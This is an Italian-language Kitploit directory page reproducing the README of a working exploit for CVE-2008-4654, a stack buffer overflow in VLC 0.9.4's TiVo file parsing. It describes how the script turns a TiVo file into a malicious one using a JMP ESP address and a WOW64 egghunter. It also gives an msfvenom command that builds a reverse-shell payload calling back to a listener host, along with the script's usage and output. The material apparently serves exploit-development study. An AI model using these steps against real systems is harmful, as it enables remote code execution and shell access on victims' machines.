Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2008-4654 — Un exploit completamente funzionante per una vulnerabilità di buffer overflow basato su stack in VideoLan’s VLC Media Player 0.9.4 durante l'elaborazione di file TiVo. | Kitploit
Strumenti/GitHubGitHub/hexastrike/cve-2008-4654
Analisi delle VulnerabilitàExploitShellcodeGenerazione di ShellcodeSviluppo PayloadBinary Exploitation
GitHubhexastrike/cve-2008-4654

CVE-2008-4654

Un exploit completamente funzionante per una vulnerabilità di buffer overflow basato su stack in VideoLan’s VLC Media Player 0.9.4 durante l'elaborazione di file TiVo.

Vedi Repository
31 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2008-4654

Un exploit completamente funzionante per la vulnerabilità di buffer overflow basato su stack CVE-2008-4654 nel VLC Media Player 0.9.4 di VideoLan durante l'elaborazione dei file TiVo. Prende di mira un binario a 32 bit in esecuzione su un sistema Windows a 64 bit e utilizza un egghunter WOW64 per aggirare lo spazio di stack limitato.

Uso

Aggiorna lo script:

  • Sostituisci il segnaposto buf = b'[...]' nello script con il tuo shellcode (ad es. da msfvenom).
  • Facoltativamente, modifica lo shellcode EGG_HUNTER_WOW64 se desideri un tag diverso o hai un egghunter personalizzato.
root@kitploit:~
python .\CVE-2008-4654.py --help

CVE-2008-4654 - VLC v0.9.4 Tivo Stack Buffer Overflow - by Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt)

usage: CVE-2008-4654.py [-h] --input INPUT --output OUTPUT

Transform a given TiVo file into a weapon with predefined shellcode.

options:
  -h, --help       show this help message and exit
  --input INPUT    Path to the input TiVo file to be weaponized.
  --output OUTPUT  Path where the modified (weaponized) TiVo file will be saved.

Come Funziona

  • Lo script cerca uno specifico pattern di byte (TIVO_PES_FILEID) nel file TiVo.
  • Sovrascrive un campo di 4 byte (20 byte dopo il pattern) con b"\x00\x00\x00\xff", che prepara la lettura fuori dai limiti che porta a un overflow dello stack.
  • Sostituisce quindi un'altra regione (92 byte dopo TIVO_PES_FILEID) con un payload personalizzato.
  • Il payload include:
    • Un indirizzo JMP ESP che dirige l'esecuzione verso lo stack.
    • Un egghunter specifico per WOW64 che scansiona la memoria alla ricerca del marcatore w00tw00t.
    • Un ampio payload shellcode definito dall'utente (il secondo stadio) posizionato dopo il marcatore, oltre lo spazio di stack limitato.
  • Quando VLC elabora il file TiVo modificato, alla fine attiva l'overflow ed esegue l'egghunter. L'egghunter trova lo shellcode completo e lo esegue, aggirando i limiti di dimensione dello stack.

Esempio

Generazione del payload

root@kitploit:~
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.10.150 LPORT=6666 -a x86 -f python -b '\x00'

Creazione del file TiVo

  • Sostituisci il segnaposto buf = b'[...]' con lo shellcode creato in precedenza.
  • Scarica un file TiVo di esempio da https://samples.mplayerhq.hu/TiVo/.
root@kitploit:~
PS C:\ > python .\CVE-2008-4654.py --input .\test.ty --output .\hazard.ty

CVE-2008-4654 - VLC v0.9.4 Tivo Stack Buffer Overflow - by Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt)

[+] Found TIVO_PES_FILEID at offset 0x300000.
[+] Replaced 4 bytes at offset 0x300014 with 0x000000ff.
[+] Replaced 685 bytes at offset 0x30005c.
[+] Successfully weaponized: .\hazard.ty

Note

  • L'exploit funziona solo su Windows x64 a causa dell'egghunter WOW64. Un approccio puramente x86 richiederebbe un egghunter standard adatto ai sistemi a 32 bit.
  • Non ci sono caratteri problematici importanti oltre a \x00 per questo specifico vettore, semplificando la generazione del payload.
  • Per un approfondimento sull'egghunting e le complessità di WOW64, consulta l'articolo di Corelan sull'egghunter WOW64 e il documento di Matt (Skape) Miller.

Risorse

  • https://nostarch.com/bughunter
  • https://nvd.nist.gov/vuln/detail/CVE-2008-4654
  • https://hexastrike.com/resources/blog/exploit-development/vlc-stack-based-buffer-overflow-exploiting-cve-2008-4654-with-a-wow64-egghunter/
  • https://www.corelan.be/index.php/2011/11/18/wow64-egghunter/
  • https://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
  • https://samples.mplayerhq.hu/TiVo/
Scarica lo strumento